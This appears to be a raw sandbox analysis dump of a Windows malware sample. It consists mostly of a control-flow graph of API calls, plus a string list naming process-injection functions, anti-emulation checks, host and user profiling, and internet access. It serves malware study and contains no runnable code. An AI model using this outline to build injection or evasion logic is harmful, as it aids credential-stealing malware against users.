4188a3 GetProcAddress 86863->86865 86866 4188b5 86863->86866 86871 418673 20 API calls 86864->86871 86865->86866 86867 4188e7 86866->86867 86868 4188be GetProcAddress GetProcAddress 86866->86868 86869 4188f0 GetProcAddress 86867->86869 86870 418902 86867->86870 86868->86867 86869->86870 86872 41890b GetProcAddress 86870->86872 86873 41891d 86870->86873 86871->86863 86872->86873 86874 418926 GetProcAddress GetProcAddress 86873->86874 86875 4184c1 86873->86875 86874->86875 86876 4010f0 GetCurrentProcess VirtualAllocExNuma 86875->86876 86877 401111 ExitProcess 86876->86877 86878 401098 VirtualAlloc 86876->86878 86880 4010b8 _memset 86878->86880 86881 4010ec 86880->86881 86882 4010d5 VirtualFree 86880->86882 86883 401284 86881->86883 86882->86881 86884 4012ac _memset 86883->86884 86885 4012bb 13 API calls 86884->86885 87361 410c85 GetProcessHeap RtlAllocateHeap GetComputerNameA 86885->87361 86887 4013e9 86890 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 86887->86890 86892 4013f4 86890->86892 86891 4013b9 86891->86887 86893 4013e2 ExitProcess 86891->86893 86892->86735 86894->86740 86895->86748 87364 4014ad GetPEB 86896->87364 86899 4014ad 2 API calls 86900 401516 86899->86900 86901 4014ad 2 API calls 86900->86901 86918 4015a1 86900->86918 86902 401529 86901->86902 86903 4014ad 2 API calls 86902->86903 86902->86918 86904 401538 86903->86904 86905 4014ad 2 API calls 86904->86905 86904->86918 86906 401547 86905->86906 86907 4014ad 2 API calls 86906->86907 86906->86918 86908 401556 86907->86908 86909 4014ad 2 API calls 86908->86909 86908->86918 86910 401565 86909->86910 86911 4014ad 2 API calls 86910->86911 86910->86918 86912 401574 86911->86912 86913 4014ad 2 API calls 86912->86913 86912->86918 86914 401583 86913->86914 86915 4014ad 2 API calls 86914->86915 86914->86918 86916 401592 86915->86916 86917 4014ad 2 API calls 86916->86917 86916->86918 86917->86918 86918->86757 86920 4016a4 wsprintfW 86919->86920 86930 
4017f7 86919->86930 86921 4016d0 CreateFileW 86920->86921 86923 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 86921->86923 86921->86930 86922 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 86924 401807 86922->86924 86928 401754 _memset 86923->86928 86924->86766 86925 401733 WriteFile 86925->86928 86925->86930 86926 401768 CloseHandle CreateFileW 86927 40179e ReadFile 86926->86927 86926->86930 86927->86928 86927->86930 86928->86925 86928->86926 86929 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 86928->86929 86928->86930 86929->86921 86929->86930 86930->86922 86932 417051 86931->86932 87368 4104e7 86932->87368 86936 417080 87373 410609 lstrlenA 86936->87373 86939 410609 3 API calls 86940 4170a5 86939->86940 86941 410609 3 API calls 86940->86941 86942 4170ae 86941->86942 87377 41058d 86942->87377 86944 4170ba 86945 4170e3 OpenEventA 86944->86945 86946 4170f6 CreateEventA 86945->86946 86947 4170dc CloseHandle 86945->86947 86948 4104e7 lstrcpyA 86946->86948 86947->86945 86949 41711e 86948->86949 87381 410549 lstrlenA 86949->87381 86952 410549 2 API calls 86953 417185 86952->86953 87385 402f12 86953->87385 86956 418950 121 API calls 86957 4172ca 86956->86957 86958 4104e7 lstrcpyA 86957->86958 87162 41757f 86957->87162 86960 4172e5 86958->86960 86962 410609 3 API calls 86960->86962 86965 4172f7 86962->86965 86963 41058d lstrcpyA 86964 4175af 86963->86964 86968 4104e7 lstrcpyA 86964->86968 86966 41058d lstrcpyA 86965->86966 86967 417300 86966->86967 86971 410609 3 API calls 86967->86971 86969 4175c6 86968->86969 86970 410609 3 API calls 86969->86970 86973 4175d9 86970->86973 86972 41731b 86971->86972 86974 41058d lstrcpyA 86972->86974 87957 4105c7 86973->87957 86976 417324 86974->86976 86979 410609 3 API calls 86976->86979 86978 41058d lstrcpyA 86982 4175f2 86978->86982 86980 41733f 86979->86980 86981 41058d lstrcpyA 86980->86981 86983 417348 86981->86983 86984 417604 CreateDirectoryA 86982->86984 
86988 410609 3 API calls 86983->86988 87961 401cfd 86984->87961 86990 417363 86988->86990 86989 41762e 88045 41824d 86989->88045 86992 41058d lstrcpyA 86990->86992 86994 41736c 86992->86994 86993 41763f 86996 41058d lstrcpyA 86993->86996 86995 410609 3 API calls 86994->86995 86997 417387 86995->86997 86998 417656 86996->86998 86999 41058d lstrcpyA 86997->86999 87000 41058d lstrcpyA 86998->87000 87001 417390 86999->87001 87002 417666 87000->87002 87005 410609 3 API calls 87001->87005 88052 410519 87002->88052 87007 4173ab 87005->87007 87006 410609 3 API calls 87008 417685 87006->87008 87009 41058d lstrcpyA 87007->87009 87010 41058d lstrcpyA 87008->87010 87012 4173b4 87009->87012 87011 41768e 87010->87011 87013 4105c7 2 API calls 87011->87013 87014 410609 3 API calls 87012->87014 87015 4176ab 87013->87015 87016 4173cf 87014->87016 87017 41058d lstrcpyA 87015->87017 87018 41058d lstrcpyA 87016->87018 87020 4176b4 87017->87020 87019 4173d8 87018->87019 87022 410609 3 API calls 87019->87022 87021 4176bd InternetOpenA InternetOpenA 87020->87021 87023 410519 lstrcpyA 87021->87023 87024 4173f3 87022->87024 87025 417707 87023->87025 87026 41058d lstrcpyA 87024->87026 87027 4104e7 lstrcpyA 87025->87027 87028 4173fc 87026->87028 87029 417716 87027->87029 87032 410609 3 API calls 87028->87032 88056 4109a2 GetWindowsDirectoryA 87029->88056 87035 417417 87032->87035 87033 410519 lstrcpyA 87034 417731 87033->87034 88074 404b2e 87034->88074 87037 41058d lstrcpyA 87035->87037 87039 417420 87037->87039 87042 410609 3 API calls 87039->87042 87041 417744 87044 4104e7 lstrcpyA 87041->87044 87043 41743b 87042->87043 87045 41058d lstrcpyA 87043->87045 87046 417779 87044->87046 87047 417444 87045->87047 87048 401cfd lstrcpyA 87046->87048 87051 410609 3 API calls 87047->87051 87049 41778a 87048->87049 88224 405f39 87049->88224 87053 41745f 87051->87053 87055 41058d lstrcpyA 87053->87055 87057 417468 87055->87057 87056 4177a2 87058 4104e7 lstrcpyA 87056->87058 87062 410609 3 API calls 
87057->87062 87059 4177b6 87058->87059 87060 401cfd lstrcpyA 87059->87060 87061 4177c0 87060->87061 87063 405f39 43 API calls 87061->87063 87064 417483 87062->87064 87065 4177cc 87063->87065 87066 41058d lstrcpyA 87064->87066 88397 413259 strtok_s 87065->88397 87068 41748c 87066->87068 87071 410609 3 API calls 87068->87071 87069 4177df 87070 4104e7 lstrcpyA 87069->87070 87072 4177f2 87070->87072 87073 4174a7 87071->87073 87074 401cfd lstrcpyA 87072->87074 87075 41058d lstrcpyA 87073->87075 87076 417803 87074->87076 87077 4174b0 87075->87077 87078 405f39 43 API calls 87076->87078 87081 410609 3 API calls 87077->87081 87079 41780f 87078->87079 88406 413390 strtok_s 87079->88406 87083 4174cb 87081->87083 87082 417822 87084 401cfd lstrcpyA 87082->87084 87086 41058d lstrcpyA 87083->87086 87085 417833 87084->87085 88413 413b86 87085->88413 87088 4174d4 87086->87088 87092 410609 3 API calls 87088->87092 87094 4174ef 87092->87094 87096 41058d lstrcpyA 87094->87096 87097 4174f8 87096->87097 87101 410609 3 API calls 87097->87101 87103 417513 87101->87103 87105 41058d lstrcpyA 87103->87105 87107 41751c 87105->87107 87113 410609 3 API calls 87107->87113 87117 417537 87113->87117 87121 41058d lstrcpyA 87117->87121 87126 417540 87121->87126 87137 410609 3 API calls 87126->87137 87138 41755b 87137->87138 87142 41058d lstrcpyA 87138->87142 87146 417564 87142->87146 87940 41257f 87146->87940 87949 411c4a 87162->87949 87169 41cc6c 10 API calls 87169->87162 87357 402b7c 87356->87357 87358 40480f 87356->87358 87357->86782 87359 404818 lstrlenA 87358->87359 87359->87357 87359->87359 87360->86862 87362 401385 87361->87362 87362->86887 87363 410c53 GetProcessHeap HeapAlloc GetUserNameA 87362->87363 87363->86891 87367 4014e9 87364->87367 87365 4014d9 lstrcmpiW 87366 4014ef 87365->87366 87365->87367 87366->86899 87366->86918 87367->87365 87367->87366 87369 4104f2 87368->87369 87370 410513 87369->87370 87371 410509 lstrcpyA 87369->87371 87372 410c53 GetProcessHeap HeapAlloc GetUserNameA 
87370->87372 87371->87370 87372->86936 87375 410630 87373->87375 87374 410656 87374->86939 87375->87374 87376 410643 lstrcpyA lstrcatA 87375->87376 87376->87374 87379 41059c 87377->87379 87378 4105c3 87378->86944 87379->87378 87380 4105bb lstrcpyA 87379->87380 87380->87378 87383 41055e 87381->87383 87382 410587 87382->86952 87383->87382 87384 41057d lstrcpyA 87383->87384 87384->87382 87386 4047e8 3 API calls 87385->87386 87387 402f27 87386->87387 87388 4047e8 3 API calls 87387->87388 87389 402f3e 87388->87389 87390 4047e8 3 API calls 87389->87390 87391 402f55 87390->87391 87392 4047e8 3 API calls 87391->87392 87393 402f6c 87392->87393 87394 4047e8 3 API calls 87393->87394 87395 402f85 87394->87395 87396 4047e8 3 API calls 87395->87396 87397 402f9c 87396->87397 87398 4047e8 3 API calls 87397->87398 87399 402fb3 87398->87399 87400 4047e8 3 API calls 87399->87400 87401 402fca 87400->87401 87402 4047e8 3 API calls 87401->87402 87403 402fe4 87402->87403 87404 4047e8 3 API calls 87403->87404 87405 402ffb 87404->87405 87406 4047e8 3 API calls 87405->87406 87407 403011 87406->87407 87408 4047e8 3 API calls 87407->87408 87409 403028 87408->87409 87410 4047e8 3 API calls 87409->87410 87411 40303f 87410->87411 87412 4047e8 3 API calls 87411->87412 87413 403056 87412->87413 87414 4047e8 3 API calls 87413->87414 87415 40306d 87414->87415 87416 4047e8 3 API calls 87415->87416 87417 403084 87416->87417 87418 4047e8 3 API calls 87417->87418 87419 40309b 87418->87419 87420 4047e8 3 API calls 87419->87420 87421 4030b2 87420->87421 87422 4047e8 3 API calls 87421->87422 87423 4030c9 87422->87423 87424 4047e8 3 API calls 87423->87424 87425 4030df 87424->87425 87426 4047e8 3 API calls 87425->87426 87427 4030f6 87426->87427 87428 4047e8 3 API calls 87427->87428 87429 40310f 87428->87429 87430 4047e8 3 API calls 87429->87430 87431 403123 87430->87431 87432 4047e8 3 API calls 87431->87432 87433 40313a 87432->87433 87434 4047e8 3 API calls 87433->87434 87435 403154 87434->87435 87436 4047e8 
3 API calls 87435->87436 87437 40316b 87436->87437 87438 4047e8 3 API calls 87437->87438 87439 403182 87438->87439 87440 4047e8 3 API calls 87439->87440 87441 403199 87440->87441 87442 4047e8 3 API calls 87441->87442 87443 4031af 87442->87443 87444 4047e8 3 API calls 87443->87444 87445 4031c5 87444->87445 87446 4047e8 3 API calls 87445->87446 87447 4031dc 87446->87447 87448 4047e8 3 API calls 87447->87448 87449 4031f2 87448->87449 87450 4047e8 3 API calls 87449->87450 87451 40320c 87450->87451 87452 4047e8 3 API calls 87451->87452 87453 403223 87452->87453 87454 4047e8 3 API calls 87453->87454 87455 40323a 87454->87455 87456 4047e8 3 API calls 87455->87456 87457 403250 87456->87457 87458 4047e8 3 API calls 87457->87458 87459 403267 87458->87459 87460 4047e8 3 API calls 87459->87460 87461 40327e 87460->87461 87462 4047e8 3 API calls 87461->87462 87463 403295 87462->87463 87464 4047e8 3 API calls 87463->87464 87465 4032ab 87464->87465 87466 4047e8 3 API calls 87465->87466 87467 4032c2 87466->87467 87468 4047e8 3 API calls 87467->87468 87469 4032d9 87468->87469 87470 4047e8 3 API calls 87469->87470 87471 4032f0 87470->87471 87472 4047e8 3 API calls 87471->87472 87473 403306 87472->87473 87474 4047e8 3 API calls 87473->87474 87475 40331c 87474->87475 87476 4047e8 3 API calls 87475->87476 87477 403333 87476->87477 87478 4047e8 3 API calls 87477->87478 87479 403349 87478->87479 87480 4047e8 3 API calls 87479->87480 87481 40335d 87480->87481 87482 4047e8 3 API calls 87481->87482 87483 403374 87482->87483 87484 4047e8 3 API calls 87483->87484 87485 40338a 87484->87485 87486 4047e8 3 API calls 87485->87486 87487 4033a1 87486->87487 87488 4047e8 3 API calls 87487->87488 87489 4033b8 87488->87489 87490 4047e8 3 API calls 87489->87490 87491 4033cf 87490->87491 87492 4047e8 3 API calls 87491->87492 87493 4033e6 87492->87493 87494 4047e8 3 API calls 87493->87494 87495 4033fd 87494->87495 87496 4047e8 3 API calls 87495->87496 87497 403414 87496->87497 87498 4047e8 3 API calls 
87497->87498 87499 40342e 87498->87499 87500 4047e8 3 API calls 87499->87500 87501 403445 87500->87501 87502 4047e8 3 API calls 87501->87502 87503 40345c 87502->87503 87504 4047e8 3 API calls 87503->87504 87505 403473 87504->87505 87506 4047e8 3 API calls 87505->87506 87507 40348a 87506->87507 87508 4047e8 3 API calls 87507->87508 87509 4034a1 87508->87509 87510 4047e8 3 API calls 87509->87510 87511 4034b8 87510->87511 87512 4047e8 3 API calls 87511->87512 87513 4034cf 87512->87513 87514 4047e8 3 API calls 87513->87514 87515 4034e9 87514->87515 87516 4047e8 3 API calls 87515->87516 87517 403500 87516->87517 87518 4047e8 3 API calls 87517->87518 87519 403517 87518->87519 87520 4047e8 3 API calls 87519->87520 87521 40352e 87520->87521 87522 4047e8 3 API calls 87521->87522 87523 403545 87522->87523 87524 4047e8 3 API calls 87523->87524 87525 40355c 87524->87525 87526 4047e8 3 API calls 87525->87526 87527 403573 87526->87527 87528 4047e8 3 API calls 87527->87528 87529 40358a 87528->87529 87530 4047e8 3 API calls 87529->87530 87531 4035a4 87530->87531 87532 4047e8 3 API calls 87531->87532 87533 4035bb 87532->87533 87534 4047e8 3 API calls 87533->87534 87535 4035d2 87534->87535 87536 4047e8 3 API calls 87535->87536 87537 4035e9 87536->87537 87538 4047e8 3 API calls 87537->87538 87539 403600 87538->87539 87540 4047e8 3 API calls 87539->87540 87541 403617 87540->87541 87542 4047e8 3 API calls 87541->87542 87543 40362d 87542->87543 87544 4047e8 3 API calls 87543->87544 87545 403643 87544->87545 87546 4047e8 3 API calls 87545->87546 87547 40365d 87546->87547 87548 4047e8 3 API calls 87547->87548 87549 403674 87548->87549 87550 4047e8 3 API calls 87549->87550 87551 40368b 87550->87551 87552 4047e8 3 API calls 87551->87552 87553 4036a1 87552->87553 87554 4047e8 3 API calls 87553->87554 87555 4036b8 87554->87555 87556 4047e8 3 API calls 87555->87556 87557 4036cf 87556->87557 87558 4047e8 3 API calls 87557->87558 87559 4036e3 87558->87559 87560 4047e8 3 API calls 87559->87560 
87561 4036f9 87560->87561 87562 4047e8 3 API calls 87561->87562 87563 403713 87562->87563 87564 4047e8 3 API calls 87563->87564 87565 40372a 87564->87565 87566 4047e8 3 API calls 87565->87566 87567 403741 87566->87567 87568 4047e8 3 API calls 87567->87568 87569 403758 87568->87569 87570 4047e8 3 API calls 87569->87570 87571 40376f 87570->87571 87572 4047e8 3 API calls 87571->87572 87573 403786 87572->87573 87574 4047e8 3 API calls 87573->87574 87575 40379a 87574->87575 87576 4047e8 3 API calls 87575->87576 87577 4037b1 87576->87577 87578 4047e8 3 API calls 87577->87578 87579 4037cb 87578->87579 87580 4047e8 3 API calls 87579->87580 87581 4037e2 87580->87581 87582 4047e8 3 API calls 87581->87582 87583 4037f6 87582->87583 87584 4047e8 3 API calls 87583->87584 87585 40380a 87584->87585 87586 4047e8 3 API calls 87585->87586 87587 403821 87586->87587 87588 4047e8 3 API calls 87587->87588 87589 403838 87588->87589 87590 4047e8 3 API calls 87589->87590 87591 40384f 87590->87591 87592 4047e8 3 API calls 87591->87592 87593 403866 87592->87593 87594 4047e8 3 API calls 87593->87594 87595 403880 87594->87595 87596 4047e8 3 API calls 87595->87596 87597 403897 87596->87597 87598 4047e8 3 API calls 87597->87598 87599 4038ae 87598->87599 87600 4047e8 3 API calls 87599->87600 87601 4038c5 87600->87601 87602 4047e8 3 API calls 87601->87602 87603 4038db 87602->87603 87604 4047e8 3 API calls 87603->87604 87605 4038f2 87604->87605 87606 4047e8 3 API calls 87605->87606 87607 403906 87606->87607 87608 4047e8 3 API calls 87607->87608 87609 40391d 87608->87609 87610 4047e8 3 API calls 87609->87610 87611 403937 87610->87611 87612 4047e8 3 API calls 87611->87612 87613 40394e 87612->87613 87614 4047e8 3 API calls 87613->87614 87615 403965 87614->87615 87616 4047e8 3 API calls 87615->87616 87617 40397c 87616->87617 87618 4047e8 3 API calls 87617->87618 87619 403993 87618->87619 87620 4047e8 3 API calls 87619->87620 87621 4039aa 87620->87621 87622 4047e8 3 API calls 87621->87622 87623 4039c1 
87622->87623 87624 4047e8 3 API calls 87623->87624 87625 4039d8 87624->87625 87626 4047e8 3 API calls 87625->87626 87627 4039f2 87626->87627 87628 4047e8 3 API calls 87627->87628 87629 403a09 87628->87629 87630 4047e8 3 API calls 87629->87630 87631 403a20 87630->87631 87632 4047e8 3 API calls 87631->87632 87633 403a37 87632->87633 87634 4047e8 3 API calls 87633->87634 87635 403a4e 87634->87635 87636 4047e8 3 API calls 87635->87636 87637 403a65 87636->87637 87638 4047e8 3 API calls 87637->87638 87639 403a7c 87638->87639 87640 4047e8 3 API calls 87639->87640 87641 403a90 87640->87641 87642 4047e8 3 API calls 87641->87642 87643 403aaa 87642->87643 87644 4047e8 3 API calls 87643->87644 87645 403ac1 87644->87645 87646 4047e8 3 API calls 87645->87646 87647 403ad7 87646->87647 87648 4047e8 3 API calls 87647->87648 87649 403aee 87648->87649 87650 4047e8 3 API calls 87649->87650 87651 403b05 87650->87651 87652 4047e8 3 API calls 87651->87652 87653 403b1c 87652->87653 87654 4047e8 3 API calls 87653->87654 87655 403b33 87654->87655 87656 4047e8 3 API calls 87655->87656 87657 403b4a 87656->87657 87658 4047e8 3 API calls 87657->87658 87659 403b61 87658->87659 87660 4047e8 3 API calls 87659->87660 87661 403b75 87660->87661 87662 4047e8 3 API calls 87661->87662 87663 403b8c 87662->87663 87664 4047e8 3 API calls 87663->87664 87665 403ba3 87664->87665 87666 4047e8 3 API calls 87665->87666 87667 403bba 87666->87667 87668 4047e8 3 API calls 87667->87668 87669 403bd1 87668->87669 87670 4047e8 3 API calls 87669->87670 87671 403be8 87670->87671 87672 4047e8 3 API calls 87671->87672 87673 403bff 87672->87673 87674 4047e8 3 API calls 87673->87674 87675 403c19 87674->87675 87676 4047e8 3 API calls 87675->87676 87677 403c30 87676->87677 87678 4047e8 3 API calls 87677->87678 87679 403c47 87678->87679 87680 4047e8 3 API calls 87679->87680 87681 403c5e 87680->87681 87682 4047e8 3 API calls 87681->87682 87683 403c75 87682->87683 87684 4047e8 3 API calls 87683->87684 87685 403c8c 87684->87685 
87686 4047e8 3 API calls 87685->87686 87687 403ca3 87686->87687 87688 4047e8 3 API calls 87687->87688 87689 403cb7 87688->87689 87690 4047e8 3 API calls 87689->87690 87691 403cd1 87690->87691 87692 4047e8 3 API calls 87691->87692 87693 403ce8 87692->87693 87694 4047e8 3 API calls 87693->87694 87695 403cff 87694->87695 87696 4047e8 3 API calls 87695->87696 87697 403d16 87696->87697 87698 4047e8 3 API calls 87697->87698 87699 403d2c 87698->87699 87700 4047e8 3 API calls 87699->87700 87701 403d43 87700->87701 87702 4047e8 3 API calls 87701->87702 87703 403d57 87702->87703 87704 4047e8 3 API calls 87703->87704 87705 403d6e 87704->87705 87706 4047e8 3 API calls 87705->87706 87707 403d85 87706->87707 87708 4047e8 3 API calls 87707->87708 87709 403d9c 87708->87709 87710 4047e8 3 API calls 87709->87710 87711 403db3 87710->87711 87712 4047e8 3 API calls 87711->87712 87713 403dca 87712->87713 87714 4047e8 3 API calls 87713->87714 87715 403de1 87714->87715 87716 4047e8 3 API calls 87715->87716 87717 403df8 87716->87717 87718 4047e8 3 API calls 87717->87718 87719 403e0f 87718->87719 87720 4047e8 3 API calls 87719->87720 87721 403e26 87720->87721 87722 4047e8 3 API calls 87721->87722 87723 403e40 87722->87723 87724 4047e8 3 API calls 87723->87724 87725 403e57 87724->87725 87726 4047e8 3 API calls 87725->87726 87727 403e6e 87726->87727 87728 4047e8 3 API calls 87727->87728 87729 403e84 87728->87729 87730 4047e8 3 API calls 87729->87730 87731 403e9b 87730->87731 87732 4047e8 3 API calls 87731->87732 87733 403eb2 87732->87733 87734 4047e8 3 API calls 87733->87734 87735 403ec9 87734->87735 87736 4047e8 3 API calls 87735->87736 87737 403ee0 87736->87737 87738 4047e8 3 API calls 87737->87738 87739 403efa 87738->87739 87740 4047e8 3 API calls 87739->87740 87741 403f10 87740->87741 87742 4047e8 3 API calls 87741->87742 87743 403f27 87742->87743 87744 4047e8 3 API calls 87743->87744 87745 403f3e 87744->87745 87746 4047e8 3 API calls 87745->87746 87747 403f55 87746->87747 87748 4047e8 3 
API calls 87747->87748 87749 403f6c 87748->87749 87750 4047e8 3 API calls 87749->87750 87751 403f80 87750->87751 87752 4047e8 3 API calls 87751->87752 87753 403f97 87752->87753 87754 4047e8 3 API calls 87753->87754 87755 403fb1 87754->87755 87756 4047e8 3 API calls 87755->87756 87757 403fc7 87756->87757 87758 4047e8 3 API calls 87757->87758 87759 403fde 87758->87759 87760 4047e8 3 API calls 87759->87760 87761 403ff2 87760->87761 87762 4047e8 3 API calls 87761->87762 87763 404009 87762->87763 87764 4047e8 3 API calls 87763->87764 87765 404020 87764->87765 87766 4047e8 3 API calls 87765->87766 87767 404037 87766->87767 87768 4047e8 3 API calls 87767->87768 87769 40404e 87768->87769 87770 4047e8 3 API calls 87769->87770 87771 404067 87770->87771 87772 4047e8 3 API calls 87771->87772 87773 40407e 87772->87773 87774 4047e8 3 API calls 87773->87774 87775 404094 87774->87775 87776 4047e8 3 API calls 87775->87776 87777 4040a8 87776->87777 87778 4047e8 3 API calls 87777->87778 87779 4040bf 87778->87779 87780 4047e8 3 API calls 87779->87780 87781 4040d6 87780->87781 87782 4047e8 3 API calls 87781->87782 87783 4040ed 87782->87783 87784 4047e8 3 API calls 87783->87784 87785 404104 87784->87785 87786 4047e8 3 API calls 87785->87786 87787 40411e 87786->87787 87788 4047e8 3 API calls 87787->87788 87789 404135 87788->87789 87790 4047e8 3 API calls 87789->87790 87791 40414c 87790->87791 87792 4047e8 3 API calls 87791->87792 87793 404163 87792->87793 87794 4047e8 3 API calls 87793->87794 87795 404179 87794->87795 87796 4047e8 3 API calls 87795->87796 87797 40418d 87796->87797 87798 4047e8 3 API calls 87797->87798 87799 4041a1 87798->87799 87800 4047e8 3 API calls 87799->87800 87801 4041b8 87800->87801 87802 4047e8 3 API calls 87801->87802 87803 4041d2 87802->87803 87804 4047e8 3 API calls 87803->87804 87805 4041e8 87804->87805 87806 4047e8 3 API calls 87805->87806 87807 4041ff 87806->87807 87808 4047e8 3 API calls 87807->87808 87809 404216 87808->87809 87810 4047e8 3 API calls 
87809->87810 87811 40422d 87810->87811 87812 4047e8 3 API calls 87811->87812 87813 404244 87812->87813 87814 4047e8 3 API calls 87813->87814 87815 404258 87814->87815 87816 4047e8 3 API calls 87815->87816 87817 40426e 87816->87817 87818 4047e8 3 API calls 87817->87818 87819 404288 87818->87819 87820 4047e8 3 API calls 87819->87820 87821 40429f 87820->87821 87822 4047e8 3 API calls 87821->87822 87823 4042b6 87822->87823 87824 4047e8 3 API calls 87823->87824 87825 4042cc 87824->87825 87826 4047e8 3 API calls 87825->87826 87827 4042e3 87826->87827 87828 4047e8 3 API calls 87827->87828 87829 4042fa 87828->87829 87830 4047e8 3 API calls 87829->87830 87831 404311 87830->87831 87832 4047e8 3 API calls 87831->87832 87833 404325 87832->87833 87834 4047e8 3 API calls 87833->87834 87835 40433c 87834->87835 87836 4047e8 3 API calls 87835->87836 87837 404353 87836->87837 87838 4047e8 3 API calls 87837->87838 87839 40436a 87838->87839 87840 4047e8 3 API calls 87839->87840 87841 404381 87840->87841 87842 4047e8 3 API calls 87841->87842 87843 404395 87842->87843 87844 4047e8 3 API calls 87843->87844 87845 4043ac 87844->87845 87846 4047e8 3 API calls 87845->87846 87847 4043c3 87846->87847 87848 4047e8 3 API calls 87847->87848 87849 4043da 87848->87849 87850 4047e8 3 API calls 87849->87850 87851 4043f1 87850->87851 87852 4047e8 3 API calls 87851->87852 87853 404408 87852->87853 87854 4047e8 3 API calls 87853->87854 87855 40441c 87854->87855 87856 4047e8 3 API calls 87855->87856 87857 404433 87856->87857 87858 4047e8 3 API calls 87857->87858 87859 40444a 87858->87859 87860 4047e8 3 API calls 87859->87860 87861 40445e 87860->87861 87862 4047e8 3 API calls 87861->87862 87863 404472 87862->87863 87864 4047e8 3 API calls 87863->87864 87865 404486 87864->87865 87866 4047e8 3 API calls 87865->87866 87867 4044a0 87866->87867 87868 4047e8 3 API calls 87867->87868 87869 4044b7 87868->87869 87870 4047e8 3 API calls 87869->87870 87871 4044cd 87870->87871 87872 4047e8 3 API calls 87871->87872 
87873 4044e4 87872->87873 87874 4047e8 3 API calls 87873->87874 87875 4044fa 87874->87875 87876 4047e8 3 API calls 87875->87876 87877 404511 87876->87877 87878 4047e8 3 API calls 87877->87878 87879 404528 87878->87879 87880 4047e8 3 API calls 87879->87880 87881 40453e 87880->87881 87882 4047e8 3 API calls 87881->87882 87883 404558 87882->87883 87884 4047e8 3 API calls 87883->87884 87885 40456f 87884->87885 87886 4047e8 3 API calls 87885->87886 87887 404586 87886->87887 87888 4047e8 3 API calls 87887->87888 87889 40459d 87888->87889 87890 4047e8 3 API calls 87889->87890 87891 4045b4 87890->87891 87892 4047e8 3 API calls 87891->87892 87893 4045cb 87892->87893 87894 4047e8 3 API calls 87893->87894 87895 4045e2 87894->87895 87896 4047e8 3 API calls 87895->87896 87897 4045f9 87896->87897 87898 4047e8 3 API calls 87897->87898 87899 404612 87898->87899 87900 4047e8 3 API calls 87899->87900 87901 404629 87900->87901 87902 4047e8 3 API calls 87901->87902 87903 404642 87902->87903 87904 4047e8 3 API calls 87903->87904 87905 404656 87904->87905 87906 4047e8 3 API calls 87905->87906 87907 40466d 87906->87907 87908 4047e8 3 API calls 87907->87908 87909 404684 87908->87909 87910 4047e8 3 API calls 87909->87910 87911 40469b 87910->87911 87912 4047e8 3 API calls 87911->87912 87913 4046b2 87912->87913 87914 4047e8 3 API calls 87913->87914 87915 4046cc 87914->87915 87916 4047e8 3 API calls 87915->87916 87917 4046e3 87916->87917 87918 4047e8 3 API calls 87917->87918 87919 4046f9 87918->87919 87920 4047e8 3 API calls 87919->87920 87921 404710 87920->87921 87922 4047e8 3 API calls 87921->87922 87923 404727 87922->87923 87924 4047e8 3 API calls 87923->87924 87925 40473d 87924->87925 87926 4047e8 3 API calls 87925->87926 87927 404754 87926->87927 87928 4047e8 3 API calls 87927->87928 87929 404768 87928->87929 87930 4047e8 3 API calls 87929->87930 87931 404781 87930->87931 87932 4047e8 3 API calls 87931->87932 87933 404797 87932->87933 87934 4047e8 3 API calls 87933->87934 87935 4047ae 

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                        • API String ID: 2238633743-2740034357
                                                                                                                                                        • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                        • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                                                        • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                        • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                        • _memset.LIBCMT ref: 00414D4F
                                                                                                                                                        • _memset.LIBCMT ref: 00414D60
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
